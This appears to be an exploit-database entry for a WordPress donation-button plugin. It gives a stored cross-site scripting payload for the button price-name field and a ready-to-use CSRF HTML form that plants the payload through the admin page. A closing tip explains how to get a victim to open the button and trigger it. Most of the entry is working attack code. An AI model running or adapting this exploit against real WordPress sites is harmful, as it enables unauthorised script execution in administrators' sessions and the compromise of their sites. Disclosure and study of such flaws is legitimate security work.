Share
## https://sploitus.com/exploit?id=WPEX-ID:5C73754C-EEBE-424A-9D3B-CA83EB53BF87
Create/Edit a Button and put the following payload in the Amount Menu Name field (wpedon_button_scpriceprice parameter): " autofocus=autofocus onfocus=alert(/XSS/) e=

Via CSRF:

<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?page=wpedon_buttons&action=new" method="POST">
      <input type="hidden" name="wpedon_button_name" value="Test" />
      <input type="hidden" name="wpedon_button_price" value="" />
      <input type="hidden" name="wpedon_button_scpriceprice" value='" autofocus=autofocus onfocus=alert(/XSS/) e=' />
      <input type="hidden" name="update" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

The name, price and id params are not required. But they are displayed on the buttons overview and can be used to attract the victims attention to edit the Button. 

The XSS will trigger when editing the affected Button